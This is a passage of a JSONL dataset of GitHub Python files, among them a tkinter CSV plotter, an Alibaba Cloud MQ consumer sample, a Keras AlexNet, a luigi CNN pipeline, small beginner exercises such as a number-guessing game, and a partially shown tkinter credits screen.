iterate_lines_from_file(filepath):\n # Ignore empty lines\n if line == \"\":\n continue\n return classification_string_is_tokenized(line)\n raise RuntimeError(\n f'Could not determine whether \"{filepath}\" is class-tokenized: empty lines only.'\n )\n","repo_name":"rxn4chemistry/rxn-metrics","sub_path":"src/rxn/metrics/tokenize_file.py","file_name":"tokenize_file.py","file_ext":"py","file_size_in_byte":4455,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73280519731","text":"#!/usr/bin/env python3\n\n\ndef menus():\n \"\"\"\n :return: a dict for showing menu's title, corresponding answer and the flag that quit from the program if it's True\n \"\"\"\n return {\n 1: {\n 'title': 'List the best musical group ever',\n 'answer': 'The Beatles are the best ever',\n 'quit': False\n },\n 2: {\n 'title': 'List the best sports team ever',\n 'answer': 'The Cubs are the best ever',\n 'quit': False\n },\n 3: {\n 'title': 'Quit',\n 'answer': 'OK! Hope you learned something.',\n 'quit': True\n }\n }\n\n\ndef show_main_menu():\n \"\"\"Showing main menu by menus\"\"\"\n showing_menus = menus()\n print('MAIN MENU')\n for i in range(1, len(showing_menus) + 1):\n title = showing_menus[i]['title']\n print(f'{i}. - {title}')\n\n\ndef main():\n show_main_menu()\n\n showing_menus = menus()\n while True:\n try:\n select = int(input('Enter the number for your choice:'))\n\n if select in showing_menus:\n answer = showing_menus[select]['answer']\n quit = showing_menus[select]['quit']\n print(answer)\n if quit:\n break\n else:\n print('That’s not one of the choices. Try again.')\n except:\n print('That’s not one of the choices. Try again.')\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"billyean/pyEx","sub_path":"sd/module3/BCE_3_3.py","file_name":"BCE_3_3.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14253051564","text":"import tkinter as tk\nfrom tkinter import filedialog\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport pandas as pd\nimport numpy as np\n\ndef csvPlot(frame, root):\n global filnavn\n filnavn = ''\n for widget in frame.winfo_children():\n widget.destroy()\n tk.Label(frame, text='Aanderaa', font='Helvetica 18 bold').pack(side=tk.TOP)\n tk.Label(frame, text='Plot csv').pack(side=tk.TOP, anchor=tk.W)\n\n menuFrame = tk.Frame(frame)\n menuFrame.pack(side=tk.TOP, anchor=tk.W)\n\n velMappuBtn = tk.Button(menuFrame, text='Vel Fíl', command=lambda: velFil())\n velMappuBtn.pack(side=tk.LEFT)\n\n teknaBtn = tk.Button(menuFrame, text='Tekna', command=lambda: tekna(fig, canvas))\n teknaBtn.pack(side=tk.LEFT)\n\n fig = Figure(figsize=(12, 8), dpi=100)\n plot_frame = tk.Frame(frame, borderwidth=1, highlightbackground=\"green\", highlightcolor=\"green\", highlightthickness=1)\n plot_frame.pack(fill=tk.BOTH, expand=True, side=tk.LEFT, anchor=tk.N)\n canvas = FigureCanvasTkAgg(fig, master=plot_frame)\n\ndef tekna(fig, canvas):\n fig.clf()\n ax = fig.add_subplot(111)\n ax.plot([1, 2, 3])\n global filnavn\n data = pd.read_csv(filnavn, sep='\\t', header=None)\n csvData = []\n tmp = data[0]\n print(tmp[0])\n thisTimestamp = tmp[0]\n thisRow = [tmp[0]]\n del tmp\n for item in data.iterrows(): # Ger dataframe við col\n itemting = item[1]\n if thisTimestamp != itemting[0]:\n thisTimestamp = itemting[0]\n csvData.append(thisRow)\n thisRow = []\n thisRow.append(itemting[0])\n 
thisRow.append(itemting[2])\n # Finn Col lables\n header = [\"Date/Time\"]\n for item in data.iterrows():\n tmp = item[1]\n if str(tmp[1]) not in header:\n header.append(str(tmp[1]))\n else:\n break\n\n df = pd.DataFrame(csvData)\n df.to_csv('Kort_Data/test.csv', index=False)\n #print(csvData)\n canvas.draw()\n canvas.get_tk_widget().pack(fill=tk.BOTH, expand=1)\n print('done')\n\n\ndef velFil():\n global filnavn\n filnavn = filedialog.askopenfile(title='Vel fíl', filetypes = ((\"txt Fílir\", \"*.txt\"), (\"csv Fílir\", \"*.csv\"), (\"all files\", \"*.*\"))).name\n print(filnavn)","repo_name":"Fiskaaling/FA_Ingestion_engine","sub_path":"Ingestion/Aanderaa/plotta_boyudata.py","file_name":"plotta_boyudata.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"18407541193","text":"#!/usr/bin/env python\n# coding=utf8\n\nfrom mq_http_sdk.mq_exception import MQExceptionBase\nfrom mq_http_sdk.mq_consumer import *\nfrom mq_http_sdk.mq_client import *\n\n# 初始化 client\nmq_client = MQClient(\n # 设置HTTP接入域名(此处以公共云生产环境为例)\n \"${HTTP_ENDPOINT}\",\n # AccessKey 阿里云身份验证,在阿里云服务器管理控制台创建\n \"${ACCESS_KEY}\",\n # SecretKey 阿里云身份验证,在阿里云服务器管理控制台创建\n \"${SECRET_KEY}\"\n)\n# 所属的 Topic\ntopic_name = \"${TOPIC}\"\n# 您在控制台创建的 Consumer ID(Group ID)\ngroup_id = \"${GROUP_ID}\"\n# Topic所属实例ID,默认实例为空None\ninstance_id = \"${INSTANCE_ID}\"\n\nconsumer = mq_client.get_consumer(instance_id, topic_name, group_id)\n\n# 长轮询表示如果topic没有消息则请求会在服务端挂住3s,3s内如果有消息可以消费则立即返回\n# 长轮询时间3秒(最多可设置为30秒)\nwait_seconds = 3\n# 一次最多消费3条(最多可设置为16条)\nbatch = 3\nprint((\"%sConsume And Ak Message From Topic%s\\nTopicName:%s\\nMQConsumer:%s\\nWaitSeconds:%s\\n\" \\\n % (10 * \"=\", 10 * \"=\", topic_name, group_id, wait_seconds)))\nwhile True:\n try:\n # 长轮询消费消息\n recv_msgs = consumer.consume_message(batch, wait_seconds)\n for msg in recv_msgs:\n print((\"Receive, MessageId: %s\\nMessageBodyMD5: %s \\\n \\nMessageTag: %s\\nConsumedTimes: %s \\\n \\nPublishTime: %s\\nBody: %s \\\n \\nNextConsumeTime: %s \\\n \\nReceiptHandle: %s \\\n \\nProperties: %s\\n\" % \\\n (msg.message_id, msg.message_body_md5,\n msg.message_tag, msg.consumed_times,\n msg.publish_time, msg.message_body,\n msg.next_consume_time, msg.receipt_handle, msg.properties)))\n print(msg.get_property(\"哈哈哈\"))\n except MQExceptionBase as e:\n if e.type == \"MessageNotExist\":\n print((\"No new message! RequestId: %s\" % e.req_id))\n continue\n\n print((\"Consume Message Fail! Exception:%s\\n\" % e))\n time.sleep(2)\n continue\n\n # msg.next_consume_time前若不确认消息消费成功,则消息会重复消费\n # 消息句柄有时间戳,同一条消息每次消费拿到的都不一样\n try:\n receipt_handle_list = [msg.receipt_handle for msg in recv_msgs]\n consumer.ack_message(receipt_handle_list)\n print((\"Ak %s Message Succeed.\\n\\n\" % len(receipt_handle_list)))\n except MQExceptionBase as e:\n print((\"\\nAk Message Fail! 
Exception:%s\" % e))\n # 某些消息的句柄可能超时了会导致确认不成功\n if e.sub_errors:\n for sub_error in e.sub_errors:\n print((\"\\tErrorHandle:%s,ErrorCode:%s,ErrorMsg:%s\" % \\\n (sub_error[\"ReceiptHandle\"], sub_error[\"ErrorCode\"], sub_error[\"ErrorMessage\"])))\n","repo_name":"aliyunmq/mq-http-samples","sub_path":"python/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3025,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"21"}
+{"seq_id":"41680937163","text":"#!/usr/bin/env python3\n\n# https://thispointer.com/python-add-a-column-to-an-existing-csv-file/\nfrom csv import writer\nfrom csv import reader\n\n# Add a column with same values to an existing CSV file\n\ndefault_text = 'Some useful text'\n# Open the input_file in read mode and output_file in write mode\nwith open('input.csv', 'r') as read_obj, \\\n open('output_1.csv', 'w', newline='') as write_obj:\n # Create a csv.reader object from the input file object\n csv_reader = reader(read_obj)\n # Create a csv.writer object from the output file object\n csv_writer = writer(write_obj)\n # Read each row of the input csv file as list\n for row in csv_reader:\n # Append the default text in the row / list\n row.append(default_text)\n # Add the updated row / list to the output file\n csv_writer.writerow(row)\n\n\n","repo_name":"MD-khan/100-days-python-with-udeny","sub_path":"day_25_csv/add_new_columns/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"6821544494","text":"from tensorflow.keras import layers, models, datasets\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\ncifar10 = datasets.cifar10\n(x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\ny_train = tf.keras.utils.to_categorical(y_train, 10)\ny_test = tf.keras.utils.to_categorical(y_test, 10)\n\nAlexnet = models.Sequential(\n [\n layers.experimental.preprocessing.Resizing(\n 227, 227, interpolation='bilinear', input_shape=x_train.shape[1:]),\n\n layers.Conv2D(filters=96, kernel_size=(11, 11), strides=(\n 4, 4), input_shape=(224, 224, 3), activation='relu'),\n layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2)),\n layers.BatchNormalization(),\n\n layers.Conv2D(filters=256, kernel_size=(5, 5), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2)),\n layers.BatchNormalization(),\n\n layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.Conv2D(filters=384, kernel_size=(3, 3), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.Conv2D(filters=256, kernel_size=(3, 3), strides=(\n 1, 1), activation='relu', padding='same'),\n layers.MaxPool2D(pool_size=(3, 3), strides=(2, 2)),\n layers.BatchNormalization(),\n\n layers.Flatten(),\n layers.Dense(4096, activation='relu'),\n layers.Dropout(.5),\n layers.Dense(4096, activation='relu'),\n layers.Dropout(.5),\n layers.Dense(10, activation='softmax')\n ]\n)\n\nAlexnet.compile(optimizer=tf.optimizers.SGD(learning_rate=0.001),\n loss='categorical_crossentropy', metrics=['accuracy'])\nAlexnet.summary()\n\nAlexnet.fit(x_train, y_train, epochs=1)\n","repo_name":"seunggihong/Conv-Flow","sub_path":"tensorflow/alexnet.py","file_name":"alexnet.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"34104492890","text":"import luigi\nimport os\nimport numpy as np\nimport json\nimport pickle\n\nfrom keras.models import load_model\n\nfrom config import DATA_ROOT, CNN_CONFIG\n\nfrom jobs.preprocess import AugmentData, PreprocessRawData\nfrom estimators import cnn\n\n\nclass KerasCNNFitModel(luigi.Task):\n \"\"\"\n Fit the Keras Convolutional Neural Network\n \"\"\"\n\n def requires(self):\n return [\n AugmentData(),\n PreprocessRawData(),\n ]\n\n def output(self):\n return luigi.LocalTarget(os.path.join(DATA_ROOT, 'pointers', 'KerasCNNFitModel.json'))\n\n def run(self):\n\n with self.input()[0].open('r') as path_file:\n paths = json.load(path_file)\n\n X_aug_train = np.load(paths['X_aug_train'])\n y_aug_train = np.load(paths['y_aug_train'])\n\n with self.input()[1].open('r') as path_file:\n paths = json.load(path_file)\n\n X_test = np.load(paths['X_test'])\n y_test = np.load(paths['y_test'])\n\n history, model = cnn.train_model(X_aug_train, y_aug_train, X_test, y_test,\n epochs=CNN_CONFIG['epochs'], batch_size=CNN_CONFIG['batch_size'])\n\n paths = {\n 'history': os.path.join(DATA_ROOT, 'cnn_history.p'),\n 'model': os.path.join(DATA_ROOT, 'cnn.h5'),\n }\n\n with open(paths['history'], 'wb') as history_file:\n pickle.dump(history.history, history_file)\n\n model.save(paths['model'])\n\n with self.output().open('w') as f:\n json.dump(paths, f)\n\n\nclass KerasCNNExtractFeatureModel(luigi.Task):\n \"\"\"\n Save the feature model from the full model\n \"\"\"\n\n def requires(self):\n return [\n KerasCNNFitModel(),\n ]\n\n def output(self):\n return luigi.LocalTarget(os.path.join(DATA_ROOT, 'cnn-feature-model.h5'))\n\n def run(self):\n\n with self.input()[0].open('r') as path_file:\n paths = json.load(path_file)\n\n model = load_model(paths['model'])\n feature_model = cnn.get_feature_extraction_model(model)\n\n feature_model.save(self.output().path)\n\n\nclass KerasCNNExtractFeatures(luigi.Task):\n \"\"\"\n Extract features from the trained convolutional neural network\n \"\"\"\n\n def requires(self):\n return [\n KerasCNNExtractFeatureModel(),\n AugmentData(),\n PreprocessRawData(),\n ]\n\n def output(self):\n return luigi.LocalTarget(os.path.join(DATA_ROOT, 'pointers', 'KerasCNNExtractFeatures.json'))\n\n def run(self):\n\n feature_model = load_model(self.input()[0].path)\n\n with self.input()[1].open('r') as path_file:\n paths = json.load(path_file)\n\n X_aug_train = np.load(paths['X_aug_train'])\n\n with self.input()[2].open('r') as path_file:\n paths = json.load(path_file)\n\n X_test = np.load(paths['X_test'])\n\n X_aug_train_features = feature_model.predict(X_aug_train)\n X_test_features = feature_model.predict(X_test)\n\n paths = {\n 'X_aug_train_features': os.path.join(DATA_ROOT, 'X_aug_train_features.npy'),\n 'X_test_features': os.path.join(DATA_ROOT, 'X_test_features.npy'),\n }\n\n np.save(paths['X_aug_train_features'], X_aug_train_features)\n np.save(paths['X_test_features'], X_test_features)\n\n with self.output().open('w') as f:\n json.dump(paths, f)\n","repo_name":"tom812191/mnist-classification","sub_path":"jobs/cnn.py","file_name":"cnn.py","file_ext":"py","file_size_in_byte":3402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"37027699756","text":"from art import logo\nimport random\n\nx = random.randint(1,100)\n\ndef play_game():\n print(logo)\n print(\"Welcome to the Number Guessing Game ! 
\\nI'm thinking of a number between 1 and 100.\\nPssst, the correct answer is 93 \")\n choose = input(\"Choose a difficulty. Type 'easy' or 'hard': \" )\n n = 1\n if choose == 'easy':\n n = 10\n elif choose == 'hard':\n n = 5\n for i in range(n):\n print(f\"You have {n-i} attempts remaining to guess the number.\")\n your_guess = int(input(\"Make a guess: \"))\n if your_guess > x:\n print(\"Too high.\")\n elif your_guess < x:\n print(\"Too low.\")\n else:\n print(\"Exacly ! Correct Answer: \", your_guess)\n break\n if your_guess != x:\n print(\"You've run out of guesses, you lose !\")\n if input(\"Do you want to continue playing game ? Type 'yes' to continue, type 'no' to endgame: \") == 'yes':\n play_game()\nplay_game()","repo_name":"chickenhihi/Project2_Guess_Number","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21555172058","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nNMax = 91\r\nintro = int(input().rstrip())\r\ntable = [0] * (NMax+1)\r\ntable[1] = 1\r\ntable[2] = 1\r\n\r\ndef fibo(n):\r\n if 2 <= n <= NMax:\r\n if table[n] == 0:\r\n table[n] = fibo(n-1) + fibo(n-2)\r\n return table[n]\r\n # else:\r\n # return fibo(n-1) +fibo(n-2)\r\n else:\r\n return 0\r\nprint(fibo(intro+1))","repo_name":"dearmysolitude/BaekJoon","sub_path":"백준/Bronze/2748. 피보나치 수 2/피보나치 수 2.py","file_name":"피보나치 수 2.py","file_ext":"py","file_size_in_byte":383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13722790604","text":"import tkinter as tk\r\nfrom PIL import ImageTk, Image\r\n\r\ndef AbrirImagen(archivo, DiferenciaResolucion):\r\n\r\n\t\tImagenReajustada = Image.open(archivo)\t\t# Abrir Imagen\r\n\r\n\t\tAncho, Altura = ImagenReajustada.size\t\t\r\n\t\tAncho = round(Ancho*DiferenciaResolucion)\r\n\t\tAltura = round(Altura*DiferenciaResolucion)\r\n\t\tMedidas = Ancho, Altura\r\n\r\n\t\tImagenReajustada = ImagenReajustada.resize(Medidas, Image.ANTIALIAS) # Ajustar el tamaño de la imagen\r\n\r\n\t\tImagenReajustada = ImageTk.PhotoImage(ImagenReajustada)\r\n\r\n\t\treturn ImagenReajustada\r\n\r\ndef AbrirImagenEX(archivo, DiferenciaResolucion):\r\n\r\n\t\tImagenReajustada = Image.open(archivo)\r\n\r\n\t\tAncho, Altura = ImagenReajustada.size\r\n\t\tAncho = round(Ancho*DiferenciaResolucion)\r\n\t\tAltura = round(Altura*DiferenciaResolucion)\r\n\t\tMedidas = Ancho, Altura\r\n\r\n\t\tImagenReajustada = ImagenReajustada.resize(Medidas, Image.ANTIALIAS)\r\n\r\n\t\tImagenReajustada = ImagenReajustada.convert(\"RGBA\") # Eliminar el fondo negro que aparece en algunas imagenes\r\n\t\tDatas = ImagenReajustada.getdata()\r\n\r\n\t\tnewData = []\r\n\r\n\t\tfor item in Datas:\r\n\t\t\tif item[0] == 255 and item[1] == 255 and item[2] == 255:\r\n\t\t\t\tnewData.append((255, 255, 255, 0))\r\n\t\t\telse:\r\n\t\t\t\tnewData.append(item)\r\n\t\t\t\t\r\n\t\tImagenReajustada.putdata(newData)\r\n\r\n\t\tImagenReajustada = ImageTk.PhotoImage(ImagenReajustada)\r\n\r\n\t\treturn ImagenReajustada\r\n\r\ndef Redondear(Valor, DiferenciaResolucion):\r\n\treturn round(Valor*DiferenciaResolucion)\r\n\r\nclass Creditos():\r\n\r\n\tdef __init__(self, DR, idioma, raiz = None):\r\n\r\n\t\t# Imágenes\r\n\r\n\t\tself.DR = DR\r\n\t\tself.Idioma = idioma\r\n\r\n\t\tself.Google_img = AbrirImagen(\"Imagenes/Google.png\", self.DR)\r\n\t\tself.Youtube_img = AbrirImagen(\"Imagenes/Youtube.png\", self.DR)\r\n\t\tself.Yo_img = 
AbrirImagen(\"Imagenes/Yo.png\", self.DR)\r\n\t\tself.Vicente_img = AbrirImagen(\"Imagenes/Vicente.png\", self.DR)\r\n\t\tself.Pildoras_img = AbrirImagen(\"Imagenes/PildorasInformaticas.png\", self.DR)\r\n\t\tself.Discord_img = AbrirImagen(\"Imagenes/Discord.png\", self.DR)\r\n\t\tself.Colegio_img = AbrirImagen(\"Imagenes/Colegio.png\", self.DR)\r\n\r\n\t\tif self.Idioma == \"español\":\r\n\t\t\tCreditos_str = \"Créditos\"\r\n\t\t\tProgramador_str = \"Programador:\"\r\n\t\t\tArtista_str = \"Artista gráfico:\"\r\n\t\t\tMusica_str = \"Musica y audio:\"\r\n\t\t\tTester_str = \"Beta Tester:\"\r\n\t\t\tProgramador_info_str = \"Jaime Sepúlveda\"\r\n\t\t\tArtista_info_str = \"70% Yo y 30% Internet\"\r\n\t\t\tMusica_info_str = \"Youtube\"\r\n\t\t\tTester_info_str = \"Vicente Sepúlveda\"\r\n\t\t\tApoyo_str = \"Muchas gracias Martín, Ivan, Jean, Alejandro,\\nNicolás, Alonso, y todos los demás del discord.\"\r\n\t\t\tProfesor_str = \"Gracias profesor Sebastían por hacer este electivo.\"\r\n\t\t\tPildoras_str = \"Muchas gracias Pildoras Informáticas por\\ncrear un curso de Python en español y gratis.\"\r\n\t\t\tVolver_str = \"Volver\"\r\n\t\t\tAnterior_str = \"Anterior\"\r\n\t\t\tSiguiente_str = \"Siguiente\"\r\n\r\n\t\telif self.Idioma == \"english\":\r\n\t\t\tCreditos_str = \"Credits\"\r\n\t\t\tProgramador_str = \"Developer:\"\r\n\t\t\tArtista_str = \"Graphic artist:\"\r\n\t\t\tMusica_str = \"Music and audio:\"\r\n\t\t\tTester_str = \"Beta Tester:\"\r\n\t\t\tProgramador_info_str = \"Jaime Sepúlveda\"\r\n\t\t\tArtista_info_str = \"70% Me and 30% Internet\"\r\n\t\t\tMusica_info_str = \"Youtube\"\r\n\t\t\tTester_info_str = \"Vicente Sepúlveda\"\r\n\t\t\tApoyo_str = \"Thank you very much Martín, Ivan, Jean, Alejandro,\\nNicolás, Alonso, and everyone else from discord.\"\r\n\t\t\tProfesor_str = \"Thanks Teacher Sebastían for teaching this class.\"\r\n\t\t\tPildoras_str = \"Thanks a lot Pildoras Informáticas for\\ncreating a free Python Course in spanish.\"\r\n\t\t\tVolver_str = \"Return\"\r\n\t\t\tAnterior_str = \"Previous\"\r\n\t\t\tSiguiente_str = \"Next\"\r\n\r\n\t\tself.Creditos_Frame = tk.Frame(raiz, width = 2050, height = 420)\r\n\t\tself.Creditos_Frame.pack()\r\n\r\n\t\tself.Botones_Frame = tk.Frame(raiz, width = 2050, height = 420)\r\n\t\tself.Botones_Frame.pack()\r\n\r\n\t\tself.Creditos_label = tk.Label(self.Creditos_Frame, text = Creditos_str, font = (\"Arial\", Redondear(60, self.DR)))\r\n\r\n\t\tself.Creditos_Titulo_Frame = tk.Frame(self.Creditos_Frame)\r\n\t\tself.Programador_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#9FE7FF\")\r\n\t\tself.Artista_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#AFFF9F\")\r\n\t\tself.Musica_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFB2B2\")\r\n\t\tself.Tester_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFFFB7\")\r\n\t\tself.Apoyo_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFFFB7\")\r\n\t\tself.Profesor_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#FFDA9E\")\r\n\t\tself.Pildoras_Frame = tk.Frame(self.Creditos_Frame, relief = \"ridge\", bd = Redondear(4, self.DR), bg = \"#C6FFBB\")\r\n\r\n\t\tself.Creditos_Titulo_Frame.grid(row = 0, column = 0)\r\n\r\n\t\tself.Programador_label = tk.Label(self.Programador_Frame, text = Programador_str, font = (\"Arial\", 
Redondear(30, self.DR)), bg = \"#9FE7FF\")\r\n\t\tself.Artista_label = tk.Label(self.Artista_Frame, text = Artista_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#AFFF9F\")\r\n\t\tself.Musica_label = tk.Label(self.Musica_Frame, text = Musica_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFB2B2\")\r\n\t\tself.Tester_label = tk.Label(self.Tester_Frame, text = Tester_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFFFB7\")\r\n\r\n\t\tself.Programador_info_label = tk.Label(self.Programador_Frame, text = Programador_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#9FE7FF\")\r\n\t\tself.Artista_info_label = tk.Label(self.Artista_Frame, text = Artista_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#AFFF9F\")\r\n\t\tself.Musica_info_label = tk.Label(self.Musica_Frame, text = Musica_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFB2B2\")\r\n\t\tself.Tester_info_label = tk.Label(self.Tester_Frame, text = Tester_info_str, font = (\"Arial\", Redondear(30, self.DR)), bg = \"#FFFFB7\")\r\n\t\tself.Apoyo_info_label = tk.Label(self.Apoyo_Frame, text = Apoyo_str,\r\n\t\t\tfont = (\"Arial\", Redondear(28, self.DR)), bg = \"#FFFFB7\", anchor = \"center\")\r\n\r\n\t\tself.Profesor_info_label = tk.Label(self.Profesor_Frame, text = Profesor_str, font = (\"Arial\", Redondear(28, self.DR)), bg = \"#FFDA9E\", anchor = \"center\")\r\n\t\tself.Pildoras_info_label = tk.Label(self.Pildoras_Frame, text = Pildoras_str, font = (\"Arial\", Redondear(28, self.DR)), bg = \"#C6FFBB\", anchor = \"center\")\r\n\r\n\t\tself.Volver_button = tk.Button(self.Botones_Frame, text = Volver_str, font = (\"Arial\", Redondear(30, self.DR)), command = lambda:self.Destruir(), bd = Redondear(6, self.DR))\r\n\r\n\t\tself.Anterior_button = tk.Button(self.Botones_Frame, text = Anterior_str, font = (\"Arial\", Redondear(30, self.DR)), command = lambda:self.CambiarPagina(1), bd = Redondear(6, self.DR))\r\n\r\n\t\tself.Siguiente_button = tk.Button(self.Botones_Frame, text = Siguiente_str, font = (\"Arial\", Redondear(30, self.DR)), command = lambda:self.CambiarPagina(2), bd = Redondear(6, self.DR))\r\n\r\n\t\tself.Creditos_label.grid(row = 0, column = 0, pady = (Redondear(10, self.DR),0), columnspan = 2)\r\n\r\n\t\tself.Creditos_Frame.after(0, lambda:self.CambiarPagina(1))\r\n\r\n\tdef CambiarPagina(self, pagina):\r\n\r\n\t\tif pagina == 1:\r\n\r\n\t\t\ttry:\r\n\t\t\t\tself.Apoyo_Frame.grid_forget()\r\n\t\t\t\tself.Profesor_Frame.grid_forget()\r\n\t\t\t\tself.Pildoras_Frame.grid_forget()\r\n\t\t\t\tself.Discord_label.grid_forget()\r\n\t\t\t\tself.Colegio_label.grid_forget()\r\n\t\t\t\tself.Pildoras_img_label.grid_forget()\r\n\t\t\texcept:\r\n\t\t\t\tpass\r\n\r\n\t\t\tself.Anterior_button[\"state\"] = \"disabled\"\r\n\t\t\tself.Siguiente_button[\"state\"] = \"normal\"\r\n\r\n\t\t\tself.Programador_Frame.grid(row = 1, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Artista_Frame.grid(row = 2, column = 0, sticky = \"ew\")\r\n\t\t\tself.Musica_Frame.grid(row = 3, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Tester_Frame.grid(row = 4, column = 0, sticky = \"ew\")\r\n\r\n\t\t\tself.Volver_button.grid(row = 5, column = 1, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Anterior_button.grid(row = 5, column = 0, pady = Redondear(20, self.DR))\r\n\t\t\tself.Siguiente_button.grid(row = 5, column = 2, pady = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Programador_label.grid(row = 0, column = 0, pady = 
Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Artista_label.grid(row = 0, column = 0, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Musica_label.grid(row = 0, column = 0, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Tester_label.grid(row = 0, column = 0, pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Programador_info_label.grid(row = 0, column = 1, padx = Redondear(20, self.DR))\r\n\t\t\tself.Artista_info_label.grid(row = 0, column = 1, pady = Redondear(10, self.DR), padx = Redondear(20, self.DR))\r\n\t\t\tself.Musica_info_label.grid(row = 0, column = 1, padx = Redondear(20, self.DR))\r\n\t\t\tself.Tester_info_label.grid(row = 0, column = 1, pady = Redondear(10, self.DR), padx = (Redondear(50, self.DR),0))\r\n\r\n\t\t\tself.Yo_label = tk.Label(self.Creditos_Frame, image = self.Yo_img)\r\n\t\t\tself.Yo_label.grid(row = 1, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Google_label = tk.Label(self.Creditos_Frame, image = self.Google_img)\r\n\t\t\tself.Google_label.grid(row = 2, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Youtube_label = tk.Label(self.Creditos_Frame, image = self.Youtube_img)\r\n\t\t\tself.Youtube_label.grid(row = 3, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Vicente_label = tk.Label(self.Creditos_Frame, image = self.Vicente_img)\r\n\t\t\tself.Vicente_label.grid(row = 4, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\telse:\r\n\r\n\t\t\tself.Programador_Frame.grid_forget()\r\n\t\t\tself.Artista_Frame.grid_forget()\r\n\t\t\tself.Musica_Frame.grid_forget()\r\n\t\t\tself.Tester_Frame.grid_forget()\r\n\r\n\t\t\tself.Yo_label.grid_forget()\r\n\t\t\tself.Google_label.grid_forget()\r\n\t\t\tself.Youtube_label.grid_forget()\r\n\t\t\tself.Vicente_label.grid_forget()\r\n\r\n\t\t\tself.Anterior_button[\"state\"] = \"normal\"\r\n\t\t\tself.Siguiente_button[\"state\"] = \"disabled\"\r\n\r\n\t\t\tself.Apoyo_Frame.grid(row = 1, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Apoyo_info_label.pack(pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Profesor_Frame.grid(row = 2, column = 0, pady = 0, sticky = \"ew\")\r\n\t\t\tself.Profesor_info_label.pack(pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Pildoras_Frame.grid(row = 3, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Pildoras_info_label.pack(pady = (Redondear(20, self.DR),Redondear(17, self.DR)), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Discord_label = tk.Label(self.Creditos_Frame, image = self.Discord_img)\r\n\t\t\tself.Discord_label.grid(row = 1, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Colegio_label = tk.Label(self.Creditos_Frame, image = self.Colegio_img)\r\n\t\t\tself.Colegio_label.grid(row = 2, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Pildoras_img_label = tk.Label(self.Creditos_Frame, image = self.Pildoras_img)\r\n\t\t\tself.Pildoras_img_label.grid(row = 3, column = 1, padx = (0,0))\r\n\r\n\tdef 